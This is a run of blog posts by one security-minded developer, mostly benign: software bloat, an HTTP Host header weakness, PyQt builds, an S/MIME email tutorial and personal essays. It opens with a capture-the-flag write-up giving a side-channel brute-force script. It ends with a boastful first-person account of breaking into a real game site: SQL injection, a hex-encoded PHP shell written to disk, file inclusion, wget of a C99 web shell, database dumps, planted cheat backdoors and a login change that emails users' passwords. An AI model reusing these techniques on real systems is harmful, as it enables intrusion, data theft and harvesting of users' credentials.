SSH public key on server’s authorized hosts list, so that you can SSH there (it doesn’t accept passwords). To do this, copy the contents of the file ~/.ssh/id_rsa.pub from your computer to ~/.ssh/authorized_keys file on the server using the PHP shell. Now you can ssh user-stsqneospz@level02-3.stripe-ctf.com and have remote control over it. Then I used the following Python code to run a webserver as endpoint. This endpoint will do most of the dirty tricks:

# the python endpoint server by AbiusX for Stripe CTF challenge 8
import string,cgi,time
from os import curdir, sep
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
class MyHandler(BaseHTTPRequestHandler):
    index=0
    lastport=None
    suspicious=[]
    def do_GET(self):
        return
    def do_POST(self):
        global postVars
        varLen = int(self.headers['Content-Length'])
        postVars = self.rfile.read(varLen)        
        self.send_response(200)
        self.send_header('Content-type',    'text/plain')
        self.end_headers()
        print self.client_address
        host,port=self.client_address
        self.wfile.write("POST OK\n");
        self.wfile.write("Data: "+str(postVars));

        if (self.lastport is not None):
            portdiff=port-MyHandler.lastport
        else:
            portdiff=0

        #if (self.index is None): self.index=0;
        with open("log.txt","a") as myfile:
            myfile.write(str(self.index)+" ("+str(portdiff)+") "+str(postVars)+"\n");
        if (portdiff!=3): #the number here depends on the chunk
            MyHandler.suspicious.append(MyHandler.index);
        MyHandler.index+=1;
        MyHandler.lastport=port
        return

def main():
    try:
        server = HTTPServer(('', 8010), MyHandler)
        print 'started httpserver...'
        server.serve_forever()
    except KeyboardInterrupt:
        print '^C received, shutting down server'
        print "Suspicious list:\n"
        print MyHandler.suspicious
        server.socket.close()

if __name__ == '__main__':
    main()

What it does is it gets a request and stores the incoming address and port and all the request data in a log file. As a matter of fact, it doesn’t store the actual port numbers, but the difference between the new port number and the last port number. It also stored an continues index number at start of each line on the log file. I provide this as the endpoint, level02-3.stripe-ctf.com:8010, which the Python web server described above. The reason for storing port differences is what solves this problem. The Idea The application on this challenge, makes one more network connections if a chunk is valid, in par with when it is not. For example consider we provide a password where first chunk is invalid, it sends this chunk to first chunk server and gets a failure. Now if it is valid, it is sent to the chunk server and result is true, so the next chunk is sent to the next chunk server, hence one extra network connection. Now using a brute-force algorithm we can find first chunk by sending 000000000000 up to 999000000000 respectively to the server, and then viewing the log file of our server to see which one has one different port increment than the other ones. Since there are indexes on the log file, we could then link them back to our original numbers. This could be repeated for the 2nd and 3rd chunk, and for the 4th we just have to brute force for the actual True result. Unfortunately, there is a lot more network activity on the server and there are many indexes with larger than usual port uses, so we’re gonna run this brute-force a few times for each chunk until we have only one candidate. The suspicious array in the server is used for that, it stores all the indices that have more than default (2,3,4) port connections, then outputs them, so that we can brute-force again only using those values. Every time we run this brute force, values are reduced until there’s only one left. This whole process took almost 1 hours for me. Here’s the brute-force code:

import os
url="https://level08-4.stripe-ctf.com/user-stsqneospz/"
webhook='level02-3.stripe-ctf.com:8010'
for passsection in xrange(0,1000):
  password='165774000%s'%str(passsection)
  data='{"webhooks":["%s"],"password":"%s"}'%(webhook,password);
  command="curl '%s' -d '%s'"%(url,data); 
  print command
  res=os.system(command);
  print res;

I hope you had fun reading through this post.

Software Bloats: epic failure and how to prevent it

AbiusX — Mon, 13 Aug 2012 16:44:24 +0000

Bloating is one of the most fatal horrors that can happen to a piece of software. It is when you have a nice working software that everyone loves, and then you start adding odd crazy features into the software that nobody but you (who spent numerous hours thinking how you could reach perfection in your software) needs or uses. It might seem not very likely but believe me, if you don’t shackle your thoughts, you’ll definitely bloat it. For example, consider Apple TextEdit, which is somewhat a counterpart of Notepad on Mac OS X. TextEdit was a very powerful tool, yet simple enough for taking a few notes. It could open MS Word documents and other RTF-like formatted documents, as well as pure ASCII text files and it would automatically recognize the encoding and save with the appropriate encoding, all without the need to go through application preferences. Now they have added Versions and a lot of other magical stuff to TextEdit (as well as many fundamental OS X apps such as Preview), and it takes ages (in comparison to a nerd’s typing speed) for it to open, save, close and behave. Personally I haven’t used Versions once in this whole year I’ve been having OS X 10.7 Lion, and I don’t think everybody else has, that’s why most people hate Versions (dare Google it!). Another case would be Mozilla Thunderbird, which is a magnificent piece of software, but I strongly doubt that anyone unfamiliar with the mechanics of modern EMailing protocols could cope with it. Thunderbird is a strong Mail client capable of almost anything, but I bet half of my blog readers won’t be able to start checking their mail with it. It wasn’t like that in the first few versions, but the developers got involved in the software so deep they could only see the world as an EMailing infrastructure, and anyone has to know whats the difference between IMAP and POP3 to drive in their world.

How to prevent it

They say that people use 20% of a software’s features 80% of their time, so bloating will just make this percentage look uglier. The best method to prevent bloating AFAIK is to go agile, this way you would only implement what your customer needs and uses, and if they didn’t like it, you would either change it or dump it. If you’re not agile, go for your customer feedbacks. Search through forums on the web and check what people think of your software and its flaws. 90% of the time, people are arguing about something that is there but shouldn’t be and 10% they are telling you to add features to the software. Keep your software shiny and polished. It’s like a car, if you drive it every day, and you add some jumble bumble to it once a day, and keep doing so for a whole year, you’re gonna have a messy car you’re very comfortable with but anyone else would panic to sit in that goo pile, let alone drive it. If you’re going to make your software better, don’t add features. I know your head is boggling with ideas on how to add things to your software every night you want to go to bed, but for everyone’s sake please cut the thought. Try to polish what you already have there, and add features when they are really necessary. When people go out (on the Web of course!) to shop for software, they choose the one which is most user friendly -and also has bare minimum required features of that genre of software- and dump everything that is hard to start getting along with. It’s a fact, don’t fool yourself. For example I love all OmniGroup products though many of them might lack certain advanced features but I can always find my way around them without any hassle and I think their huge customer base thinks just the same.

HTTP Host Alteration Attack

AbiusX — Sun, 15 Jul 2012 22:54:15 +0000

While I was thinking about certain ways of summarizing CSRF prevention for OWASP PHP Security Cheat Sheet - mixing taint tracking with different request criteria – I found a certain type of attack against certain high-level web applications and frameworks, which I named it HTTP Host Alteration Attack. Many web appl1ications rely on the HTTP host (accessible via $_SERVER['HTTP_HOST'] in PHP) to determine their running environment, e.g development or deployment. For example, if HTTP_HOST is localhost, 127.0.0.1, or 192.168.*.*, the application is presumably running in development mode, so it would dump error details, SQL queries, profiling details and more importantly, stack traces. When the application is running on a deployment server, it logs errors instead of dumping them, and reduces critical details on the screen. Also credentials for connecting to the database and other 3rd party tools are different on development and deployment servers. The code snippet below, taken from earlier versions of the almighty jFramework, is used to determine the running state of the application:

if (jURL::HTTPHost()==”localhost”) reg(“app/state”,”develop”); elseif (strpos(jURL::HTTPHost(),”jframework.info”)!==false) #replace this with your site reg(“app/state”,”deploy”); elseif (php_sapi_name()==”cli”) reg(“app/state”,”develop”); else trigger_error(“No running state determined.”);

Then the rest of application behaviors are determined by this state. Now what the developer (embarrassingly myself) had forgotten there, was that HTTP Host is provided with the HTTP Request, and though it is part of the standard HTTP protocol and should ALWAYS be provided and valid, can easily be forged by an attacker. I became aware of this issue while using my Mozilla Add-on, IRUnfilter, to get around Iran’s Internet restrictions. IRUnfilter removes the Host header from HTTP Request – which is used by government to determine if a site is allowed or not – and sends the request to a web proxy outside Iran, which effectively replaces the host header with the valid value. Now if you skip the proxy and visit a jFramework powered website using it, the “No running state determined.” error would pop-up. An attacker could simply replace the Host header instead of removing it, with something fabulous such as “localhost”, to get “Development” access to the deployed application. I was about to advertise jFramework’s old method of determining the state in OWASP’s wiki, but fortunately I was a little busy and started to realize this issue before publishing it to the world!

PyQtX, binary PyQt distributions for Mac OS X

AbiusX — Sun, 08 Jul 2012 17:33:23 +0000

Qt is a rather magnificent and silent framework. Every application I tend to find amusing and well developed, is based on Qt, but nobody really knows that. There’s not much boasting around it, as it is around .NET Framework. As a few examples, VLC, Google Earth, VirtualBox and the whole KDE desktop and all of its applications, are based on Qt. Nowadays Qt provides cross-platform programming for Windows, OS X, Linux, Symbian, Android (beta), Windows Mobile (beta) in a dozen programming languages (C++, Python, Java, Ruby, PHP, etc.). Compared to GTK it is very well designed and provides for a magnificent quality of code. Unfortunately based language for Qt is C++, which is not really suitable for most of todays applications, since they rarely require that much performance and low level access. Python on the other hand, is the jewel of high level programming languages. PyQt, is a robust Qt binding for Python, provided by Riverbank Computing. PyQt is installable in Ubuntu linux with just a few apt commands. There is also a stable Windows installer with Qt libraries included. Unfortunately until now there were no OS X binary distros, and compiling PyQt on OS X was a big hassle. I have a separate post on how to compile the pile on OS X, but no need for that as I have published PyQtX, the binary distributions of PyQt on OS X, which is available both on Riverbank Computing’s PyQt download page and sourceforge.net at the following address:

sourceforge.net/projects/pyqtx

If you live on a Mac OS X, and you are a developer, this is a must have. You need Python 2.7 for this to use (obtain from official website).

Secure Web Application Framework (in Persian)

AbiusX — Sun, 08 Jul 2012 11:24:09 +0000

I just finished my Bachelor’s thesis with the topic “Secure Web Application Framework”, unfortunately it’s in Persian, thus only Persian readers can enjoy it. It’s about 200 pages, which about half of it review web concepts (theory and practice) from a security perspective. The other half has mostly advanced theory/practice about web security and the secure framework around it (with respect to an actual web application framework). Unfortunately I was pushed hard by the deadline for this, and it’s not what I could call a thesis done by me, but this is probably 10 times better than any other. A glossary of the terms is also included as an appendix. I did this thesis based on my 5 years of active career as a security expert, my 4.5 years of active OWASP participation (with a lot of code review, coding and standard review on many projects such as ESAPI, ASVS, WebGoat, etc.) and my 3 years of lead developer in jFramework. I bet it will be interesting

Click here to view/download

PS.

This document is considered a draft by me yet. Please address any issues/feedback to me so that I can fix this. I might complete this and publish it as a book.

Greed is Good

AbiusX — Tue, 26 Jun 2012 19:49:36 +0000

This is not about the digital world, neither about the sin or religion, but it’s good to read. I’m gonna declare a cure for cynicism here on this post. Whether you’re a Christian or a Muslim (or even irreligious), you most probably believe Greed to be a bad thing, and a deadly sin perhaps. Since I was a child, I always defied my own greed and tried to be as indifferent about excessive growth as possible, to control greed and not letting it grow it’s roots inside of me, taking control. But Muslim scholars have an alternate belief, that nothing in this world is purely evil – not even sins or devil himself – and everything is for the good of something. That one I didn’t keep in mind while I was wrestling that wicked creature… Now I’m greedless. I’ve been greed-free for a dozen years, and nothing seems to really interest me. I’ve had my chances of acquiring huge wealth, power and status and I’ve grasped them from time to time, but always let go way before it actually meant something. I’ve also been a cynic for a dozen years, with no interesting point in my life. Don’t take me wrong, I’m very dedicated, motivated and hardworking and mostly successful too, I just don’t see a point. I’m not passionate about anything. I don’t love doing stuff. I don’t even like it. I just know what is good to be done, so I do it. Out of nowhere, I realized that being greed-free is my problem. No greed causes cynicism. Greed is Good for motivation, for passion, for progress and for life. It’s not just good, it is mandatory. Let me tell you a story… On my first trip to Iraq, me and a couple friends visited Bazaar to buy some goods and souvenir to bring for our families. The shopkeepers at the Bazaar seemed very odd in our point of view, they had no desire to sell their goods to us; they had no greed. We intended to spend considerable money, yet nobody was interested. We had to pick the goods ourselves, package them, count them and pay the price for them. To make it more weird, one of the shoppers left his shop in the middle of our progress! I started thinking, why would they want more money? There’s nothing they can get with more money. All they want – and could have – with their lives is an air conditioner, a house, and some basic food, which are all available for free there. A couple years later, on my second trip to Iraq, we also wanted some souvenir, but this time things were different. The United States had established it’s infrastructure in Iraq, and people were greedy now. You could see the greed glowing in their eyes. They craved for money. Things were much more expensive. Money was suddenly more important than anything else. Greed had the sovereign. Greed, like any other human emotion and desire, is a horse to tame, not a bug to kill or a weakness to destroy. Greed will devour one if it is not tamed, and can be exploited as a weakness, yet without it one can not proceed well.

Speaking Session at Tarbiat Moalem University

AbiusX — Tue, 03 Apr 2012 01:54:35 +0000

The next Monday, 21st Farvardin (Jalali) I’ll be having a speaking session at Tarbiat Moalem (aka Kharazmi) University, set up by my dearly respected professor, Dr. Ehsan Malekian.

I’ll be covering some aspects of Epistemology combined with theories and practices of information security, and a general discussion of what is yet to come.

The session is held at 10:00 AM at Computer Engineering Department, the computer site.

Hope to see you people there

P.S: Tarbiat Moalem university is located at Karadj city, Hesarak sq.

Certified E-Mail with Comodo and Thunderbird

AbiusX — Fri, 10 Feb 2012 19:15:02 +0000

This is intended to be a theoretical/practical tutorial on how to use email certificates to encrypt and digitally sign your emails. There are approximately 2 million emails transferred every hour, out of which 80% are spam, and the email world is really creepy, so I strongly recommend you to read the rest of this post.

First of all, let’s cover some theory. There are three Internet protocols involved in sending and receiving emails: SMTP, IMAP, POP

Simple Mail Transfer Protocol is the one responsible for sending emails. An email client – where you compose your email, set recipients, attach files, etc. – sends your email data to a mail server via SMTP. The protocol is fairly simple and the only things worth mentioning is that it can do that under SSL (encrypted connection to server to transfer mail) and use Password Authentication to separate accounts.

Pactical Scenario: GMail

Most of us have used GMail, via creating an account in gmail.com and logging in there. It is very important to know that gmail.com is GMail Client, and smtp.gmail.com is GMail Server. When you log into the GMail, you access its client application, and do your stuff there. Since both client and server applications are on the same machine (Google Servers), your work is quickly sent to the server, that’s why you usually don’t notice.

Everybody can setup a Mail Server on their machine. Famous mail server applications are Microsoft Outlook for Windows and Exim and Postfix for Linux machines. GMail uses neither and has a custom coded server. You don’t need to provide a password to a mail server, neither you have accounts there. You can send any email from any server to any server, i.e you can send email from admin@facebook.com with any body you want to me@abiusx.com. It’s just a packet of data with a name on it (just like ordinary mail).

Famous servers like GMail, that deal with millions of users and lots of spam, implement technologies that require you to login, have accounts and do things lawfully. Other servers don’t. Mail that doesn’t follow GMail and other famous mail server’s rules, are usually treated as spam.

Back to the theory

POP usually used as POP3, is the old-school mail receiving protocol. Mail client uses this protocol to download all mails from the server. The protocol is very handicapped and weak, much like FTP.

IMAP on the other hand is a pretty recent and powerful mail receiving protocol, so basically POP and IMAP are replacements of each other. There were days when not many mail servers provided IMAP to their clients, now almost every web server provides full IMAP support. GMail’s IMAP is accessible at imap.gmail.com (Keep in mind that this is the domain for IMAP protocol, and not HTTP, so heading your browser to it would not bring up anything)

* * *

Today, many important interactions are done electronically. You can even buy cars online, and all of this involves some emailing. The providers email you your balance sheet, your username/password, your instructions for your education, your contest results and many many other things.

Theory: The problem(s)

1. Now consider something bad happens, such as a hacker forges an email from your university, telling you that you’re fired and can not continue your education, or that you need to pay certain money to a certain bank account. You have no way of telling if it’s legit -sent by the university- or fake (remember, email is just mail in bytes, and as forge-able as mail).

2. The other bad thing that might happen is, eavesdroppers and even your mail provider, would read your mail and extract content form it. You can be quite certain that every picture, every piece of information, every Word document and everything else you send through GMail is deeply analyzed by Google and stored to be handed over to CIA, NSA, etc. It doesn’t matter if your own email is @gmail.com or your recipient’s, either way your email passes through GMail servers.

Even if you have your own Mail Server (like my mail.abiusx.com), when you send/receive email, your message is passed through many email posts around the globe, and they seem to do the same analysis.

Theory: The solution

To stop forgery, you need to actually prevent two things: Manipulation of your message headers (who it is from) and manipulation of your message content (what it contains).

Digital Signature, is the well known solution, which provides both Authenticity (proving who the signature really belongs to) and Integrity (not a single dot in the message is changed). The mechanics of Digital Signature are quite complex, yet they rely on Public Key Cryptography.

Public Key Cryptography, provides us with a system having a pair of keys, the Private Key, and the Public Key. Everything that is locked with either is only unlockable by the other, e.g if you encrypt a message with someone’s public key, the message can only be decrypted by his private key -which is in fact only in his own hands-.

Unfortunately, to use everything related to the Public Key Cryptography, we need to use PKI (Public Key Infrastructure), and to use PKI, we need to obtain a SSL Certificate (Which contains our information and our public key, but not our private key). SSL Certificates are considered a luxury and are quite expensive for individuals (approximately $100 a year for every single use case).

Fortunately, Comodo is providing free email certificates so that everybody can send digitally signed emails.

To handle the second problem, we need encryption. We have to encrypt our email body, in a way that only our final target can decrypt and read it. Since email is not live, we can’t agree on a particular key and transfer data encrypted with it, and more importantly, our target usually is not aware of us sending an email to him.

To encrypt the message in a way that only our specific target can read it, we need to have his public key (which is included in his certificate) and encrypt the message with it, ensuring that only he himself can decrypt it with his private key. Unfortunately, there is no online database having certificates of all emails, so we need a means to obtain our targets certificate before we can send him encrypted messages.

This is particularly easy, considering every digitally signed message contains a copy of signer’s certificate at the bottom, so if we are using a modern mail client (2010+, when S/MIME was standardized by IETF) and we receive a digitally signed email from someone, and we ourselves have a digital certificate (to sign our own messages), our mail client automatically stores that “someone’s” certificate so that from then on, we can send him encrypted emails.

Now enough with the theory babble, off to enjoying the real deal:

Practice: Let’s send and receive encrypted, signed email

First of all, we have to have a modern mail client. Unfortunately, neither GMail’s web-based client nor Yahoo’s web-based clients support S/MIME yet. I myself strongly recommend you to use the mighty Mozilla Thunderbird, the best mail client I have seen after Apple’s Mail (which only runs on a Mac).

After downloading Thunderbird, we can at least see if a message is digitally signed, and if it’s signature is valid or not. With GMail and Yahoo’s web based clients, we only see a downloadable smime.p7s file!

The first time Thunderbird stars up, it asks for your email account credentials. Keep in mind that you can not use free Yahoo mail with Thunderbird or any other mail client (other than Yahoo’s web site), since they do not provide free POP3 or IMAP. Any other mail service is fine. After you enter your email credentials, Thunderbird automatically lists all your email settings, folders, and messages. There are also plenty of options to suit your particular needs. Now whenever you receive new email, Thunderbird informs you and you can easily see it, without the need to open a browser or even go online.

Next step is, to obtain an email certificate for our own email address. As I stated earlier on this post, Comodo is providing them for free to encourage secure email practice at :

http://www.comodo.com/home/email-security/free-email-certificate.php

The only thing that you have to enter correctly there, is your email address. All other fields are mandatory for a X.509 Certificate but are not checked against anything. After you fill the form, an email is sent to you, containing a link to receive your certified certificate. I suggest you visit this link with Mozilla Firefox, it makes thing a hell lot easier.

You need to add this certificate to your system. If you’re using a Mac, it will be added to your Keychain, but on Windows, every application keeps it’s own list of certificates, the operating system also does the same. When you open the link in Firefox, a dialog pops up telling you that the certificate was successfully installed. Now you need to go to Tools -> Options -> Advanced -> Encryption -> View Certificates -> Your Certificates and select it from the list, click Backup and save it somewhere on your computer inside a .p12 file (PKCS#12 Protocol). You need ot provide a password to encrypt the file, since it contains your private key as well as your certificate. Keep in mind NOT TO give this file to anyone, or they can legitimately forge you.

Now in Thunderbird, Tools -> Options -> Advanced -> Certificates -> View Certificates -> You Certificates press Import and select the file you just exported. You need to enter the password you used to encrypt it now, and once it is imported into Thunderbird, you’re all set.

Now open a new mail window, click on the Security arrow in toolbar, click on “Digitally Sign This Message”. A seal icon is added to the bottom right of your message. You can’t encrypt your message yet, since you haven’t stored anyone else’s public key in your Thuderbird. I suggest you send me your signed email, and I’ll reply it with my signed email, so you will have my public key and can send me encrypted email afterwards.

Note: The first time you click on “Digitally Sign This Message” there’s a question asking you to setup certificates for your email address. Click yes and select your imported certificate from the list. This is necessary since Thunderbird can handle plenty of mail addresses at the same time, and has to know which certificate belongs to which one.

Have fun sending/receiving signed and sealed email!

Edit 1:

In case you’re using this with Apple Mail.app, you have to provide your admin password everytime you submit a signed mail. That’s because Mail.app will need to access your private key (in Keychain Access) to sign a message. To fix this, follow the guides in this post: https://abiusx.com/certified-e-mail-with-comodo-and-thunderbird/

Edit 2:

You should do all the steps using Firefox (either if you’re using Mail.app or Thunderbird). When you visit the initial certificate creation page, COMODO creates a private key and stores it in your browser, so after you get the email you should open it in the same browser, or you would see an error (private key not found). Also Firefox has easiest backup feature.

How the browser MMO and CodeIgniter Hacked

AbiusX — Sun, 05 Feb 2012 16:33:24 +0000

This one is intended to be an educational/tutorial post on how I hacked an MMORPG web browser Persian game known as ~~Removed From Text~~ and along with it, the well known PHP framework CodeIgniter used for developing it. Reading this might help you learn a thing or two about information security.

First of all, you’re not encouraged at all to do anything against ~~Removed From Text~~.com or any other CodeIgniter powered website using this technique or any equivalent technique. I am a world-class professional hacker and it’s practically impossible to track my actions in the Internet, I use well implemented anonymity/privacy networks and BOTNETs to perform my tasks and infiltrate systems in a way that’s very hard to detect.

Defacing any website – for any purpose – and/or stealing its private data it’s a felony in international treaties and therefore is condemned highly. The intent of this article is only educational.

* * *

Finding the vulnerability

A few days ago, I visited ~~Removed From Text~~ to play an online web-based browser game which is purely Persian. I was well aware of the game and it’s developers, since I was the coordinator for their participation in 3rd Digital Media Fair of Tehran. I played for a while, and started thinking this might take a long time, so I decided to cheat.

Probing the site and its features for a while, I figured a SQL Injection vulnerability in it’s “Forgot Password” feature. It’s worthy of note that SQL Injection vulnerabilities are usually found in the least attended, most obsolete sections of a website. Like a small polling dialog, or a forgot password dialog.

The vulnerability which can be seen at http://~~Removed From Text~~.ir/main/forgetPassword by entering foo as username and 1′ morgh as the password, brings up the following dialog at http://uc.~~Removed From Text~~.com/index.php/forget/index :

A Database Error Occurred
Error Number: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘morgh” at line 1 SELECT `uid` FROM uc_users WHERE username=’foo’ and email=’1′ morgh’ Filename: /var/www/universalcommander/models/forgetmodel.php Line Number: 17

It’s actually a nice one, and seems to allow me to do visible SQL Injection attacks and pull out the entire application database, but it doesn’t (only because of a programmers bug which came to save them here), and I’ll describe the reason in a while. Googling around the error, makes one know that the infrastructure used in the site is in fact the famous PHP framework : CodeIgniter One might think that well-known highly-used PHP frameworks are bug free, but it’s not entirely true, as we shall see in the rest of this post. Replacing the entered email 1′ morgh with 1′ and 1=0 union select 1 – (note: there’s an space after — and also ‘ is a single quote, wordpress tends to change it) to peform union-bypass SQL Injection, results in the following error:

A Database Error Occurred
Error Number: 1222 The used SELECT statements have a different number of columns SELECT `uid` , `username`, `email` FROM uc_users WHERE username=’foo’ and email=’1′ and 1=0 union select 1 — ‘ Filename: /var/www/universalcommander/models/forgetmodel.php Line Number: 11

Oddly, this error is not about the same SQL query as above! This one is the same, but with the difference that it asks for 3 columns as result. This makes us unable to perform union bypassing, since one of the queries asks for 1 column and the other asks for 3, and we can only inject both in the same way, and we can’t ask for select 1,2,3 and select 1 at the same time (union requires both sides to have equal columns). Unfortunately, the programmers here have done something not logical which has prevented us from hacking this system and left us with only a Blind Injection vulnerability. Blind injections are much weaker and much slower, yet employing a powerful tool such as SQLMap I was able to run every SELECT query I desired on the server.

Exploiting the vulnerability

Since CodeIgniter filters all dangerous characters in a HTTP GET request, I only probed for POST vulnerabilities. The one described above is also a POST SQL Injection vulnerability. To use POST vulnerabilities in SQLMap, you have to provide it with a HTTP Request file:

POST http://uc.~~Removed From Text~~.com/index.php/forget/index HTTP/1.1 Host: uc.~~Removed From Text~~.com User-Agent: Mozilla/4.0 username=abiusx&email=hacked@abiusx.com

With the following command line:

sudo python sqlmap.py -r requestfile.txt –sql-query=”PUT YOUR QUERY HERE” –dump

And SQLMap will do the rest, namely using blind injection to return result of your query. You can also use –tables, –databases, –passwords and etc. switches to ask SQLmap to list appropriate database stuff for you.

Sapping some critical data

At this point, there are two kinds of information that are of extreme value for us to continue elevating ourselves. First are username/passwords and second are session information. Other types of data are not of much value since we can only perform SELECT queries and can’t change anything in the database. We have to seek administrator users and get our hands on their passwords, so that we can elevate ourselves and infiltrate the system in an administrative layer. There is a well-established security practice, that you have to only store hashes of passwords (which is a one-way digest of the password) in your database, and not the actual passphrases. Hashes are meant to be irreversible back to passwords, and every time a user tries to login, the hash is generated again and compared against the hash available in the database. Unfortunately, most Iranian developers don’t respect this practice and store the original passwords, thus hackers finding a simple SQL Injection are able to know all the passwords of all the users, and it’s a proven fact that, most users use the same password everywhere. This was not the case though, and ~~Removed From Text~~ developers used hashes, and not only weak hashes such as MD5 (which are irreversible), they used strong hashes such as SHA512 with Salting, so that a hacker could not know password from hashes. To harden my practice, my favorite supercomputing service for breaking hashes (passcracking.ru) was also unavailable at the time. Failed to acquire some passwords, I headed to get some session information. First I logged into the website with my own user, changed my IP, and refreshed the page. Bingo, the site does not force IP Validation, so I can log in as any other user, while he/she is also logged in, and system won’t notice. To do some Session Hijacking all I needed was a SessionID. I reaped through all database tables, searching for sessions, but found none. This amazed me so much, as nobody keeps sessions in files these days, that I started doubting I’m hacking the right server.

My share of disappointment

I checked count of users, and it matched. I checked some other stuff and it seemed that some game information is not available in any of the databases, and there were many databases. That’s when I started doing this in terminal:

dig s2.~~Removed From Text~~.ir dig s4.~~Removed From Text~~.ir dig ~~Removed From Text~~.com

Bingo! These sites are not hosted on the same server. I was hacking the wrong server all this time! I switched to the other server, which was the actual game server, and found out that the “ForgotPassword” feature is protected by a reCAPTCHA. Now I was doomed, since blind injections won’t work with CAPTCHAs.

But I wouldn’t give up, since if there’s a single vulnerability in a website, there is indeed another.

Seeking some other obsolete features of the website, I figured out that they have i18n (Internationalization) and provide both English and Persian versions of the website. i18n is a very tricky feature and since it’s not used widely and tested well enough, usually has bugs here and there.

I did some WebScarab on the i18n feature, and figured out that when I click the Iran flag, it sends “FA” to the server and when I click the UK flag, it sends “EN”. Well what if I sent something else intentionally? I used FireBug+FireCookie to change my “Language” cookie from “Farsi” to “Morgh”, since the application seemed to keep language preferences in the cookie, and voila:

An Error Was Encountered
Unable to load the requested language file: language/morgh/general_lang.php

What does it mean? It means that language phrases are stored in files in the appropriate language folder, e.g “farsi ” sentences are stored in “language/farsi/*”. This error opens up the possibility of a File Inclusion attack. From the previous error I figured that files are stored in /var/www/~~Removed From Text~~/application/language/farsi/. Now all I had to do was to store my desired code somewhere in the server (the hard part) and point the language loader to it. This time I changed the language from morgh to ../../../../../tmp/ so that the absolute language path would become:

/var/www/~~Removed From Text~~/application/language/../../../../../tmp/general_lang.php

Which is in fact in terms of operating system paths:

/tmp/general_lang.php

I chose /tmp since it has full write accesses for everyone, and I could put some file there much easier.

MySQL is much better than MS SQL, yet not impenetrable

As I told you before, I couldn’t do some blind injection to enumerate database information, but I could still run SQL queries. Out of all possible queries, I chose this injection:

‘ and 1=0 union select “ This one is very tricky, what is does is, it uses union bypass on the first query (remember, the second programmer’s bug – aka query – expected 3 columns) to store the string as the result of a SQL query into the file “/tmp/general_lang.php”. The string is actually a valid PHP code, that runs everything it receives in the operating system terminal (they used Ubuntu). This query also pops the same error we got on our first server, but this time it does its trick and makes the file. Now I simply refreshed my login page’s source code, only to encounter the following:

0 <?php echo shell_exec($_REQUEST[q])

It seems that CodeIgniter had some other tricks up it’s sleeve, it changed < and ( ) characters to their equivalent HTMLEntities to prevent XSS and similar attacks. It actually took me a while to figure out it was the framework’s doing, I was thinking I made some mistakes first.
Breaking the habbit
The good news was, I knew a way to bypass it. The bad news was, the /tmp/general_lang.php already existed and I couldn’t use MySQL’s into outfile to overwrite it. The other good news were, I still had a limited number of tries, since the application used a bunch of language files, not only “general_lang.php”. This time, I used an online string to hex tool to get the hex equivalent of my supposed PHP code “
‘ and 1=0 union select unhex(“3c3f706870206563686f207368656c6c5f6578656328245f524551554553545b715d29″) into outfile “/tmp/races_lang.php” –

This time, the mighty CodeIgniter could not filter my hex-encoded parameter so it left it as is, and MySQL took care of decoding it back to the actual code via unhex() function. Now I had a functional terminal access to the server, although with a limited user such as www-data. The rest of the process is piece of cake, yet I will describe it to you.
Eating the Cake
I used the following commands to find a suitable spot to upload my actuall shell:
ls -la /var/www
Result was:

-rwxrwxr-x 18 root root 4096 Feb 4 11:10 index.php -rwxr-xr-x 22 root root 4096 Feb 4 12:25 repairing.php drwxrwxr-x 1 root root 0 Jan 2 12:31 system

drwxr-xr-x 5 root root 4096 Feb 5 15:11 ~~Removed From Text~~ drwxr-xr-x 21 root root 4096 Oct 20 15:33 ~~Removed From Text~~Game2-- drwxr-xr-x 3 root root 4096 Oct 12 15:38 ~~Removed From Text~~Game2~~ lrwxrwxrwx 1 root root 8 Sep 4 13:15 IptV -> ~~Removed From Text~~ drwxrwxrwx 10 sshadmin sshadmin 4096 Jan 2 12:54 azOld drwxrwxrwx 8 root root 4096 Feb 4 05:21 azpanel drwxrwxrwx 10 root root 4096 Oct 19 19:55 chat. drwxr-xr-x 2 root root 4096 Oct 15 14:00 email igniter drwxrwxrwx 7 root root 4096 Feb 4 05:16 help drwxrwxrwx 5 www-data www-data 4096 Oct 26 19:54 helptest drwxrwxrwx 4 www-data www-data 4096 Oct 19 19:28 help~ -rwxrwxr-x 1 root root 177 Sep 4 2010 index.html drwxr-xr-x 7 root root 4096 May 30 2011 register~ drwxr-xr-x 2 www-data www-data 4096 Feb 4 04:10 s5 drwxrwxrwx 4 root root 4096 Feb 5 18:56 s5b drwxr-xr-x 4 root root 4096 Jul 6 2011 store-- drwxrwxrwx 3 www-data www-data 4096 Aug 2 2011 tools -rwxrwxr-x 1 root root 7491 Sep 9 2010 webmin.log drwxrwxrwx 7 root root 4096 Feb 4 12:29 wordpress

Those folders who have “www-data” as owner, are totally workable for me. Also those with the access “rwxrwxrwx” have full write accesses for everybody, so I could also do my stuff in them. Let’s assume I used the folder “help”, which is accessible via the URL help4.~~Removed From Text~~.ir. How did I figure that out? Simply by reading the files in /etc/apache2/sites-enabled/ with my tool and the command cat /etc/apache2/sites-enabled/*. Now I used the following command to upload C99 (web-based terminal) to the server:
wget “http://www.Sh3LL.org/c99.txt?” -O /var/www/help4/shell.php
And simply access my beloved C99 shell at http://help4.~~Removed From Text~~.ir/shell.php . Now I headed for what I was most enthusiastic about, the source code of the online game! I’m one of top Iranian PHP developers, and I could develop an online MMORPG easily, but that would require lots of time and money, so I was eager to get my hands on their code, both to know what they did and to know their mistakes and help them back. I did the following commands to compress the whole /var/www folder and make it accessible via web, then downloaded it on my PC:
tar -zcvf /var/www /tmp/code.tar.gz # takes a few minutes, its 500 MB ln -s /tmp/code.tar.gz /var/www/help/code.tar.gz
Then I removed the code (or maybe I forgot to?). Now I wanted the whole database to be able to run the game on another server, presumable my own system, but I needed MySQL root password for that. Don’t panic, the ~~Removed From Text~~ team made it easy, they had to put username/password of the database in /var/www/~~Removed From Text~~/application/config/database.php, and they intended to use root for their game, so I took the password from the file, and did the following:
mysqldump -u root -pROOTPASS –all-databases | gzip > /tmp/mysql.tar.gz ln -s /tmp/mysql.tar.gz /var/www/help/mysql.tar.gz
And downloaded the whole MySQL data to my system as well (570 MB). The next step I took, was to change plenty parts of the source code, to allow me to cheat. For example, I put some backdoors to build my builds in less than a second, some to full my pool of resources, some to add money to me, and etc. The final step, was to obtain list of user passwords. Since there were 17000 users on the database, and their passwords were salted and SHA hashed, I didn’t dare pay for a supercomputer to break all of them, instead I changed the login script of the ~~Removed From Text~~ to email a copy of the username/password whenever a user logs into the system, and I have obtained 5000 username/password pairs since then.
Epilogue
